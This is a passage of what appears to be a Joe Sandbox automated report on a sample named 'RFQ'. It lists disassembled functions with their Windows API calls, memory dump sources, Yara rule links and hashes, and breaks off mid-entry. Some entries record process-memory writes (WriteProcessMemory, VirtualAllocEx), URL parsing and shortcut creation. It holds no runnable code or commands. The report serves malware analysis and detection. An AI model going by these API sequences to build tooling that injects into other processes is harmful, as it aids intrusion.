                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0076AB10
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                    • Opcode ID: b9ba486140e7c736095c1c0c9a3c3a6da263bf8dce65c1b69c140242855f9f71
                                                                                                                                                    • Instruction ID: bb42a3472f06286aa19e529ce7c197ecc9d39db9f1369c779b432926f591f327
                                                                                                                                                    • Opcode Fuzzy Hash: b9ba486140e7c736095c1c0c9a3c3a6da263bf8dce65c1b69c140242855f9f71
                                                                                                                                                    • Instruction Fuzzy Hash: 5DF04F71200209BFEB221FA4EC88F773BAEFF45754F004129F946D7190DA689C018E61
                                                                                                                                                    Function 0076EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0076EC94
                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0076ECAB
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 0076ECC3
                                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 0076ECDF
                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0076ECF9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                                    • Opcode ID: ff2a8d165b4112e07da417321f639a11be1db223d7cf1e89698f2cb0872b24c9
                                                                                                                                                    • Instruction ID: 681df6d8bc085164b2879f64c99e97b018c46d961ef74ff53068316adb9b8689
                                                                                                                                                    • Opcode Fuzzy Hash: ff2a8d165b4112e07da417321f639a11be1db223d7cf1e89698f2cb0872b24c9
                                                                                                                                                    • Instruction Fuzzy Hash: 47016D34500705ABEB345B10DE9EFD677B8BF00B05F044669A983A14E1EBF8AA94CB64
                                                                                                                                                    Function 0074B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EndPath.GDI32(?), ref: 0074B0BA
                                                                                                                                                    • StrokeAndFillPath.GDI32(?,?,007AE680,00000000,?,?,?), ref: 0074B0D6
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0074B0E9
                                                                                                                                                    • DeleteObject.GDI32 ref: 0074B0FC
                                                                                                                                                    • StrokePath.GDI32(?), ref: 0074B117
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2625713937-0
                                                                                                                                                    • Opcode ID: ae67f7a7237acaa9acb5fed7537a67fa98aee3b3cd98ed1a04f0b4233868ec80
                                                                                                                                                    • Instruction ID: d3d2a40f63b6b1889a4e7bdb65f0fefba089e8846656501a9c55a04d3cc2f4ac
                                                                                                                                                    • Opcode Fuzzy Hash: ae67f7a7237acaa9acb5fed7537a67fa98aee3b3cd98ed1a04f0b4233868ec80
                                                                                                                                                    • Instruction Fuzzy Hash: 1FF0B634004249EFDB25AF69EC0DB653B65AB10362F58C315E425850F0DB3E8D66DF59
                                                                                                                                                    Function 0077F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0077F2DA
                                                                                                                                                    • CoCreateInstance.OLE32(007BDA7C,00000000,00000001,007BD8EC,?), ref: 0077F2F2
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0077F555
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                    • String ID: .lnk
                                                                                                                                                    • API String ID: 948891078-24824748
                                                                                                                                                    • Opcode ID: fd0a48ffa7604cdc79b27424a9498fcf42cc8f24b620b1baa179fbafc7c8a9b8
                                                                                                                                                    • Instruction ID: 7074a2b5f085e4b409f9ecf269d5900475100cfd5d13e3ff14841904bf3d6457
                                                                                                                                                    • Opcode Fuzzy Hash: fd0a48ffa7604cdc79b27424a9498fcf42cc8f24b620b1baa179fbafc7c8a9b8
                                                                                                                                                    • Instruction Fuzzy Hash: BBA14BB1104201AFD701EF64C889EAFB7ECEF98314F40495DF55597192EB74EA09CBA2
                                                                                                                                                    Function 0077E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0073660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007353B1,?,?,007361FF,?,00000000,00000001,00000000), ref: 0073662F
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0077E85D
                                                                                                                                                    • CoCreateInstance.OLE32(007BDA7C,00000000,00000001,007BD8EC,?), ref: 0077E876
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0077E893
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                                    • String ID: .lnk
                                                                                                                                                    • API String ID: 2126378814-24824748
                                                                                                                                                    • Opcode ID: e9e77ed130d35f9b6483b612766c2a2c518fc9d6cd7328500433eec9b1ab648d
                                                                                                                                                    • Instruction ID: 551bf52c29dca516946e897ca6f3562280b2a3c0b70ef3dd3200d166e73f080f
                                                                                                                                                    • Opcode Fuzzy Hash: e9e77ed130d35f9b6483b612766c2a2c518fc9d6cd7328500433eec9b1ab648d
                                                                                                                                                    • Instruction Fuzzy Hash: 3FA14675604301DFCB10DF14C488D6ABBE5BF89350F158998F99A9B3A2CB39EC45CB92
                                                                                                                                                    Function 0075325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 007532ED
                                                                                                                                                      • Part of subcall function 0075E0D0: __87except.LIBCMT ref: 0075E10B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                                                    • String ID: pow
                                                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                                                    • Opcode ID: 6f97c9dba680d58bbdfda840ad74495a826d21fdd923872777c62bc0e052469b
                                                                                                                                                    • Instruction ID: 75803446e7d1105476b6fe0450e42c3476a069be0eb76720e1cac8872030a797
                                                                                                                                                    • Opcode Fuzzy Hash: 6f97c9dba680d58bbdfda840ad74495a826d21fdd923872777c62bc0e052469b
                                                                                                                                                    • Instruction Fuzzy Hash: 9E517B31A08A0592CB196714C9057FA2B94AB40793F208D2CFCC5851F9EFFD8FCD9A46
                                                                                                                                                    Function 00774606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,007CDC50,?,0000000F,0000000C,00000016,007CDC50,?), ref: 00774645
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 007746C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharUpper$__itow__swprintf
                                                                                                                                                    • String ID: REMOVE$THIS
                                                                                                                                                    • API String ID: 3797816924-776492005
                                                                                                                                                    • Opcode ID: c5fe8bd7c764136adf864bc062fbf42fe9ce93c00525c8157873e8adbbaf829c
                                                                                                                                                    • Instruction ID: 5ec3f9c1b9a80c70ca7ea2088e988efc53345e52a987f27c6634aa7f619c4adc
                                                                                                                                                    • Opcode Fuzzy Hash: c5fe8bd7c764136adf864bc062fbf42fe9ce93c00525c8157873e8adbbaf829c
                                                                                                                                                    • Instruction Fuzzy Hash: B041A274A00209DFCF05EFA4C885AADB7B5FF49344F14C469E91AAB292DB38DD45CB50
                                                                                                                                                    Function 0076C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0077430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0076BC08,?,?,00000034,00000800,?,00000034), ref: 00774335
                                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0076C1D3
                                                                                                                                                      • Part of subcall function 007742D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0076BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00774300
                                                                                                                                                      • Part of subcall function 0077422F: GetWindowThreadProcessId.USER32(?,?), ref: 0077425A
                                                                                                                                                      • Part of subcall function 0077422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0076BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0077426A
                                                                                                                                                      • Part of subcall function 0077422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0076BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00774280
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0076C240
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0076C28D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                                    • Opcode ID: b29aae8868f901b5a757f13941d89ec2e670ce7a6c7e276f1330b4c241ae947f
                                                                                                                                                    • Instruction ID: 341f2f3459125e8b5befb1cbf6b6187d8abc223a90372989f99bf1aeb625db4b
                                                                                                                                                    • Opcode Fuzzy Hash: b29aae8868f901b5a757f13941d89ec2e670ce7a6c7e276f1330b4c241ae947f
                                                                                                                                                    • Instruction Fuzzy Hash: C4414B72900218AFDF11DFA4CC95AEEB7B8BF09740F008095FA8AB7181DB756E55CB61
                                                                                                                                                    Function 0079A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007CDC00,00000000,?,?,?,?), ref: 0079A6D8
                                                                                                                                                    • GetWindowLongW.USER32 ref: 0079A6F5
                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0079A705
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                                    • Opcode ID: 3cd6828b9416fd4537172cb426c0e6aa951f90cc8ea7ab71956acf864b45bebe
                                                                                                                                                    • Instruction ID: 2b625a113eec3d093c83525f685cbfa525339fd029c3dc843d499446443b038a
                                                                                                                                                    • Opcode Fuzzy Hash: 3cd6828b9416fd4537172cb426c0e6aa951f90cc8ea7ab71956acf864b45bebe
                                                                                                                                                    • Instruction Fuzzy Hash: 4331C031201609ABDF218E78DC45BE677A9EB49324F254724F875932E0D738AC508B91
                                                                                                                                                    Function 00785180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00785190
                                                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 007851C6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CrackInternet_memset
                                                                                                                                                    • String ID: |$Dx
                                                                                                                                                    • API String ID: 1413715105-3259052687
                                                                                                                                                    • Opcode ID: 65d602d612b2c6041c00073550e6d6a6abba4b71143ba19fb0cc10c47624d911
                                                                                                                                                    • Instruction ID: ce963a30745149f3cf4a74647164678fb9498cc99ea5e5796b8435ab9fb912d1
                                                                                                                                                    • Opcode Fuzzy Hash: 65d602d612b2c6041c00073550e6d6a6abba4b71143ba19fb0cc10c47624d911
                                                                                                                                                    • Instruction Fuzzy Hash: 49310971C00119EBDF11EFA4CC89AEEBFB9FF18710F104015E815B6166EA35A956DBA0
                                                                                                                                                    Function 0079A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0079A15E
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0079A172
                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0079A196
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                                                    • Opcode ID: cd3edd5c60458561d87374d6d509d2ec5b14dea2be49e10bd97737c99f71224e
                                                                                                                                                    • Instruction ID: 1f8a62ab96a21e70c3ab3fb72902ec2ede1c2fc6529d379c762d4ada6f91db9d
                                                                                                                                                    • Opcode Fuzzy Hash: cd3edd5c60458561d87374d6d509d2ec5b14dea2be49e10bd97737c99f71224e
                                                                                                                                                    • Instruction Fuzzy Hash: E321BF32540218BBDF218F94DC46FEA3B79EF48754F110214FE55AB1D0D6B9AC50CB94
                                                                                                                                                    Function 0079A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0079A941
                                                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0079A94F
                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0079A956
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                                                    • Opcode ID: cfe92fb80187b01a1ef09a81ae3d50aebe360307f0615332b7bc787dab61a347
                                                                                                                                                    • Instruction ID: 229e694a1ed70311d21f6bdadddc43d9e1dcbd4c18b2664107387341dd44aa84
                                                                                                                                                    • Opcode Fuzzy Hash: cfe92fb80187b01a1ef09a81ae3d50aebe360307f0615332b7bc787dab61a347
                                                                                                                                                    • Instruction Fuzzy Hash: 69217CB5601209BFEF11DF18DC81DB737ADEB5A3A8B450159FA049B261DB38EC11CAA1
                                                                                                                                                    Function 007999A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00799A30
                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00799A40
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00799A65
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                                    • String ID: Listbox
                                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                                    • Opcode ID: d609509b759d3c74e4b604e6e1eb806ff32585bc6c4638bb1488029ef1218ae2
                                                                                                                                                    • Instruction ID: c19fbca92ccc067608a0b8dc2904296f0d10477c00557d9799e29316cc9e9196
                                                                                                                                                    • Opcode Fuzzy Hash: d609509b759d3c74e4b604e6e1eb806ff32585bc6c4638bb1488029ef1218ae2
                                                                                                                                                    • Instruction Fuzzy Hash: 6721C532610118BFEF218F58DC85FBF3BAAEF89764F018129FA4497190C679AC51C7A0
                                                                                                                                                    Function 0079A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0079A46D
                                                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0079A482
                                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0079A48F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
